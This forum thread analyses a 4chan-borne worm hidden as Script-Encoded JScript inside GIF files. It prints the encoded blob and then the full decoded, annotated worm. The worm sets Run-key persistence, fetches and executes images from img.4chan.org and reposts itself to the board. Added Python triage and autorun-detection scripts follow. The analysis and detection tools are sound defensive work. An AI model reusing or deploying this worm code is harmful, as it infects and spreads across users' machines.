Irongeek

Obfuscated Javascript in a JSE in an Image


OK, I found these images on 4chan that have encoded JavaScript in them; you have to save the GIF as a .jse to run them (but don't!!! I'm just uploading the images so you can see what they are). Exactly how is this encoded, and can anyone tell what it does? This seems to be the script part:

GIF89aI	=	"x1!þ÷";
#@~^pwkAAA==-mD~XtMP',xAPzmOk7+p6(L+1O`rH/Xhs c(tSuKPKr#I@#@&-lMPd4VV~x,xnh,)1Yr7+or4N+1O`rjmMk2Oc?tsVr#i@#@&-lMP6/GPx~ +APz^Yb\np}4Ln^D`E?1.bwObxTRsbVjXkYn:}4%n1YJ*I@#@&\lM~r+,',xnh~)1Yr\pr(Ln^D`J(UD+.xOA62^WM+Dcba2VbmCYbWUE*i@#@&@#@&r‰Ji@#@&dtV^R^E..xOfb.+1YG.HP'~WkW oOUwn1kmVsKV9nDv bi@#@&d4VVc.E `J1h[PJm,mGwz~'JEP3~UC d1Dk2OwEsVgCs+~3Pr-J,/HdRN/nJ*i@#@&DDX,`@#@&JûJp@#@&P,P,/4+sscDnoq.kD+cE_|Ziw'?G0DAmDn'-tkmMWkG0D-wbx[GS/-'/EMD+ O#+M/bWU-w]!xw-kz/N/nEBPJAd1DrwD~J4~rP3P0kWcL+D?2+1kCswWV9nDv #,Q~J'-kXdR%dJbi@#@&8,mCO1t`nb, N@#@&@#@&h4bV`F*PP~YMX~ @#@&@#@&,PP,atMRWanU`roYE~~E4YOw=&zb:L WmtCUcW.oJ8JJS,!*i@#@&JörI@#@&P~P,64.c/+D]+$E+kOu+mNDcJ(W HGNbWkNRjbxmnEBPU+S~GlO`Z##p@#@&~P,PatMRdn N`*I@#@&PP,~-lMPalL+~x,64Dc.+kwGUk+KnaDi@#@&@#@&,P~,YMXPP@#@&~P,P~P,Pa4MRWanxvJoOE~,wmonRhCDm4`J@!l,t.n6'Jc4DY2)'&'zrso'Rc1tmU-cW.o'z8wJ/D1wz'N_' Rc#J#,FDS,!bi@#@&Jèri@#@&,PP~~,P~64.c/n Nv#i@#@&,~P,P~P,\C.,k:,xP +h,)^Yb\(64%n1YcJz[W94 jDD+Chr#I@#@&~,P~,P,PksRsGNPxP2i@#@&,PP,~P,Pks OXa+,'~FI@#@&P~P,~P,PrhcWwnUv#I@#@&~,P~,P,PksRS.kD+c64D ./wKU/AW9zbi@#@&,P~P~~,Pr:cdl7+PGwkVncrL Lknr~~y#p@#@&rÿJp@#@&,P~P,P~~kt+^sRMExvEA/1DbwOP&8,L LknJ*i@#@&,PP~N,mCY14v+b, )@#@&@#@&,~P,\CD,4[.HP',cJr_HmO4RMl NG:cb*RdE(dYM`+bp@#@&~~,P-lM~4+C9P{PJ'D'UO J~_,4[.HP_,E-M-x;GUYxDO9kd2K/rYbGx=PWGM:O[CDlIP Cs+xri@#@&@#@&P,~P7l.Pal.O8P',W/KRWanUK6DsrVncrXE~,+~,FbI@#@&JÓEI@#@&~P,~al.DFchDbYctl[P3PE./YKwD'x-MwUJ,_,wCon slOm4cz@!/2C Pk[xrxGY4.l[v-9_#J#]qT,_~tl[~3PJ!20bV+p~Wk^+ lh+xCcor0'.- -.w J#I@#@&P~P,2mDO8R1VWk+vbi@#@&@#@&,P~~7lD,2lMY ,x~0kWcW2+UP6Osbs+vJ"EBP S~8#I@#@&Eúri@#@&P,PPalMO ch.kD+ccrJ_tCY4RDmU[Ws`*# /;8kY.`ybP3P4nmNPQ~r:GNwM-U'D'xDobdY'Dwx OE~3P49.X,_PrRR-M- Jbi@#@&,P~PaCDD ^^W/nc*i@#@&@#@&,P~,/4+V^RM;xvJ^:9P&^,mWazPJ4PHQdXkRN/n_"~aJSPZSP8#I@#@&@#@&~~,P-lM~aWdDP{Pxh,)mDk-+or8%mYvEb9WN( jYM+m:E#I@#@&JÙEi@#@&P,P~2K/Y hKNnP{~2i@#@&P,PPaWkORDX2+,'~qp@#@&,~P,wWkO Wa+ `bi@#@&,P~PaG/DRsGmNs.GssrVcrwE*i@#@&@#@&P,~PDDzPP@#@&~,PP,~P,k+cUC\bomYn`E4DY2)J&kso *1tlU KDLz(&r#I@#@&,PP,P,~P9W~ @#@&~~,PP,~P,PP, 
jCc/^+nwcqZ!bi@#@&JÅri@#@&,PP~~,P~8,A4ksPvk+cDCNH?OlD+~Z{Pc*I@#@&PP,~~P,Pb+ /OGa`bi@#@&P,P~~,PPrncNGm!hxOcmKW3b+,xPrxA/|/Oz^+'p~+XwkMnd'rP3PU+A~GlO+vT#,_~EpPwCO4'&i,[K:Cbx{Rc1tmURKDLJp@#@&~,PP)~mmYm4cn#, )@#@&@#@&Eöri@#@&,~P,64.cWwnUvJ2WkOr~~rtDYw=zJ[lDR*m4lU KDoJ8zb:o(GCD9Rat2JS~Z#I@#@&~P,Pa4MR/nO"+5EdDCnmND`rZKUYxOO:X2nr~PrhE^YkaC.YJ0KDhO[CDlIP(GE NC.H'J~Q,4[DHbp@#@&,P,P64Dcd+ NcwK/Obp@#@&@#@&P,PPqjuRkV+2`XTZ!T#p@#@&@#@&N~1lY^4v+bPPN,8@#@&VKACAA==^#~@


Yeah, this has been a yellow square, a red square, a non-working image, etc.

I've seen tuts on how to decode it using http://www.virtualconspiracy.com/index.php...e=/scrdec/intro .

Hiding JavaScript in GIF images has been around for a while, though; I myself have seen it on ha.ckers.org quite a while ago.

//edit

Interesting: removing the first part* of either GIF file made my virus scanner delete the file, saying it was a trojan horse "VBS/Psyme".

*first part:

GIF89aI	=	"x1!þ÷";

Edited by DanielG

I wondered what it was encoded with; Byte_Bucket from Pauldotcom pointed me at a tool called "Windows Script Encoder" from Microsoft that seems to be what was used.

The encoded part seems to start with #@~^, which is also what the MS tool makes.

The encoder is here: Windows Script Encoder

http://www.microsoft.com/downloads/details...;displaylang=en

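A triage script for files like the ones in the first post, added here as an example (it is not code from the thread or from Microsoft's tool). It does not decode anything; it checks the two things that can be verified without scrdec: that the file opens with "GIF89a" glued to an identifier and an assignment (which is what makes the GIF signature parse as JScript), and that the Windows Script Encoder envelope is present and well formed. The envelope layout used here is the one scrdec documents: "#@~^", six base64 characters plus "==", the encoded text, six base64 characters plus "==", then "^#~@". Assumptions, labelled in the code: the first field is a little-endian uint32 length counting the encoded characters between the two fields, the second is a uint32 checksum (not recomputed here), "@#@&" is screnc's encoding of CR LF, the non-ASCII bytes in the constructed sample file are a guess at the bytes behind "þ÷", and the sample payload is filler rather than real screnc output.

```python
import base64
import re
import struct

# Markers that Microsoft's Windows Script Encoder (screnc.exe) wraps around its
# output; scrdec documents the envelope as
#   "#@~^" + 6 base64 chars + "==" + encoded text + 6 base64 chars + "==" + "^#~@"
ENV_START = b"#@~^"
ENV_END = b"^#~@"

# "GIF89a" glued to identifier characters, then "=", then a string literal:
# this is what lets the GIF signature parse as a JScript assignment.
GIF_JS_PREFIX = re.compile(rb'^(GIF89a[A-Za-z0-9_$]*)[ \t]*=[ \t]*"')

# The length field exactly as it appears in the blob posted above ("#@~^pwkAAA==").
THREAD_LENGTH_FIELD = b"pwkAAA=="


def u32_field(field: bytes) -> int:
    """Decode one 8-character envelope field ("xxxxxx==") as a little-endian uint32."""
    if len(field) != 8 or not field.endswith(b"=="):
        raise ValueError("envelope field must be 6 base64 characters plus '=='")
    return struct.unpack("<I", base64.b64decode(field))[0]


def gif_js_header(data: bytes):
    """Details of the GIF-as-JScript prefix, or None if the file does not start that way."""
    m = GIF_JS_PREFIX.match(data)
    if not m or len(data) < 10:
        return None
    # An image viewer reads bytes 6..9 as the logical screen width/height,
    # so the identifier tail and the "=" turn into absurd dimensions.
    width, height = struct.unpack("<HH", data[6:10])
    return {"identifier": m.group(1), "width": width, "height": height}


def parse_envelope(data: bytes) -> dict:
    """Locate a Script Encoder envelope anywhere in data and sanity-check its fields."""
    start = data.find(ENV_START)
    if start < 0:
        raise ValueError("no '#@~^' marker: not Script Encoder output")
    end = data.find(ENV_END, start)
    if end < 0:
        raise ValueError("'#@~^' found but no '^#~@' trailer: truncated file?")
    payload = data[start + 12:end - 8]
    declared = u32_field(data[start + 4:start + 12])
    checksum = u32_field(data[end - 8:end])  # a real decoder verifies this
    return {
        "offset": start,
        "declared_length": declared,
        "payload_length": len(payload),
        # Assumption: the length field counts the encoded characters between
        # the two fields; treat a mismatch as a hint of truncation or tampering.
        "length_matches": declared == len(payload),
        "checksum": checksum,
        # Assumption: screnc writes each CR LF as "@#@&", so this estimates lines.
        "encoded_lines": payload.count(b"@#@&") + 1,
    }


def triage(data: bytes) -> dict:
    """Combine both checks into one verdict for a candidate file."""
    gif = gif_js_header(data)
    try:
        env = parse_envelope(data)
    except ValueError as exc:
        env = {"error": str(exc)}
    return {"gif_js_header": gif, "envelope": env,
            "suspicious": gif is not None and "error" not in env}


def make_sample(encoded_text: bytes) -> bytes:
    """Constructed fixture: the GIF prefix from the thread around a well-formed
    envelope. The payload is opaque filler, not real screnc output, and the
    checksum is a placeholder zero."""
    length = base64.b64encode(struct.pack("<I", len(encoded_text)))  # 8 chars
    checksum = base64.b64encode(struct.pack("<I", 0))
    return (b'GIF89aI\t=\t"x1!\xfe\xf7";\r\n' + ENV_START + length
            + encoded_text + checksum + ENV_END + b"\r\n")


if __name__ == "__main__":
    sample = make_sample(b"xAPzmOk7+p6(L+1O`rH@#@&-lMPd4VV~x" * 3)
    print(triage(sample))
    print("length declared by the posted blob:", u32_field(THREAD_LENGTH_FIELD))
```

Run against the posted blob's own header, `u32_field(b"pwkAAA==")` gives 2471, which is the size screnc recorded for the encoded script; a real GIF starting `GIF89aI<tab>=<tab>` would claim a 2377x2365 logical screen, which is a cheap tell on its own.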

Ok, this tool:

http://www.virtualconspiracy.com/content/scrdec/download

which I found out about here:

http://www.aspheute.com/english/20011123.asp

can decode it.

Here are the contents:

GIF89aI	=	"x1!þ÷";   // the GIF signature doubles as a JScript variable assignment
var xhr = new ActiveXObject("Msxml2.XMLHTTP");              // HTTP client
var shell = new ActiveXObject("WScript.Shell");             // run commands, write registry
var fso = new ActiveXObject("Scripting.FileSystemObject");  // file access
var ie = new ActiveXObject("InternetExplorer.Application"); // hidden IE instance, used for the cookie below

"‰";   // bare string literals like this are no-op statements
// persistence: copy itself to the temp folder (special folder 2) as sys.jse
shell.currentDirectory = fso.getSpecialFolder(2);
shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse");
try {
"û";
// autorun at logon; "wscript /b" is batch mode, so no error dialogs are shown
shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse", "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse");
} catch(e) {}

// main loop: fetch /b/, run the first linked image as a script, then post itself
while(1) { try {

xhr.open("get", "http://img.4chan.org/b/", 0);             // synchronous request
"ö";
xhr.setRequestHeader("If-Modified-Since", new Date(0));     // defeat caching
xhr.send();
var page = xhr.responseText;

// download the first image linked from the board index and execute it as JSE
// (other copies posted as images contain the same kind of script)
try {
xhr.open("get", page.match(/<a href="(http:\/\/img\.4chan\.org\/b\/src\/\d+\....)/)[1], 0);
"è";
xhr.send();
var im = new ActiveXObject("Adodb.Stream");
im.mode = 3;                        // read/write
im.type = 1;                        // binary
im.open();
im.write(xhr.responseBody);
im.saveToFile("j.jse", 2);          // 2 = overwrite
"ÿ";
shell.run("wscript /b j.jse");
} catch(e) {}

// build a multipart/form-data reply to the first thread on the page,
// attaching sys.jse under the filename a.gif
var bdry = (""+Math.random()).substr(2);
var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name=";

var part1 = fso.openTextFile("y", 2, 1);   // 2 = for writing, 1 = create
"Ó";
part1.write(head + "resto\r\n\r\n" + page.match(/<span id="nothread(\d+)/)[1] + head + "upfile; filename=a.gif\r\n\r\n");
part1.close();

// random digits appended after the file data so every upload differs
var part2 = fso.openTextFile("z", 2, 1);
"ú";
part2.write((""+Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n");
part2.close();

// y + sys.jse + z concatenated in binary mode is the complete POST body
shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1);   // hidden window, wait for exit

var post = new ActiveXObject("Adodb.Stream");
"Ù";
post.mode = 3;
post.type = 1;
post.open();
post.loadFromFile("p");

// load the board in IE and expire the nws_style cookie for .4chan.org
try {
ie.navigate("http://img.4chan.org/b/");
do {
WSH.sleep(100);
"Å";
} while (ie.readyState != 4);       // wait for READYSTATE_COMPLETE
ie.stop();
ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
} catch(e) {}

"ö";
xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
xhr.send(post);

WSH.sleep(50000);                   // wait 50 seconds, then repeat

} catch(e) {} }

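The decoded script gives a defender two host artifacts: a copy of itself as sys.jse in the temp folder (fso.getSpecialFolder(2)) and a Run value named sysjse that launches it with "wscript /b". The following is an added example, not code from the thread, that parses the text output of `reg query` for the HKCU Run key and scores each autorun on those traits. It assumes the usual `reg query` layout (a key line followed by indented "name type data" lines separated by runs of spaces; value names containing spaces are not handled), and the sample output it parses is constructed for the example.

```python
import re
from pathlib import PureWindowsPath

# Output in the shape of:  reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# Constructed sample for this example; the sysjse line mirrors what the
# decoded script's regWrite call would create on an XP-era system.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    sysjse    REG_SZ    wscript /b C:\DOCUME~1\owner\LOCALS~1\Temp\sys.jse
    Backup    REG_SZ    "C:\Program Files\Tools\wscript.exe" C:\Scripts\backup.vbs
"""

VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
SCRIPT_EXTS = {".jse", ".vbe", ".js", ".vbs", ".wsf"}
TEMP_MARKERS = ("\\temp\\", "\\tmp\\", "\\locals~1\\")


def parse_reg_query(text: str) -> list:
    """Turn `reg query` output into a list of {key, name, type, data} dicts."""
    values, key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            values.append({"key": key, **m.groupdict()})
    return values


def split_command(data: str) -> tuple:
    """Split a Run-key command line into (program, args), honouring quotes."""
    parts = [p.strip('"') for p in re.findall(r'"[^"]*"|\S+', data)]
    return (parts[0].lower() if parts else "", parts[1:])


def assess(value: dict) -> dict:
    """Score one autorun value: one point per trait shared with the dropper."""
    program, args = split_command(value["data"])
    reasons = []
    if PureWindowsPath(program).name in SCRIPT_HOSTS:
        reasons.append("launched through a Windows Script Host binary")
    if any(a.lower() in ("/b", "//b") for a in args):
        reasons.append("/b (batch mode) suppresses script errors and prompts")
    targets = [a for a in args if PureWindowsPath(a).suffix.lower() in SCRIPT_EXTS]
    if targets:
        reasons.append("runs script file(s): " + ", ".join(targets))
        if any(m in t.lower() for t in targets for m in TEMP_MARKERS):
            reasons.append("script lives in a temp folder")
    return {"name": value["name"], "data": value["data"],
            "score": len(reasons), "reasons": reasons}


def suspicious_autoruns(reg_text: str, threshold: int = 3) -> list:
    """Return the autorun values scoring at or above threshold (max score is 4)."""
    return [r for r in map(assess, parse_reg_query(reg_text)) if r["score"] >= threshold]


if __name__ == "__main__":
    for hit in suspicious_autoruns(SAMPLE_REG_QUERY):
        print(hit["name"], hit["score"], hit["reasons"])
```

On a live box the input would come from `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM key, which this script does not write to); the legitimate backup.vbs entry scores 2 and stays under the threshold, while sysjse hits all four traits.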
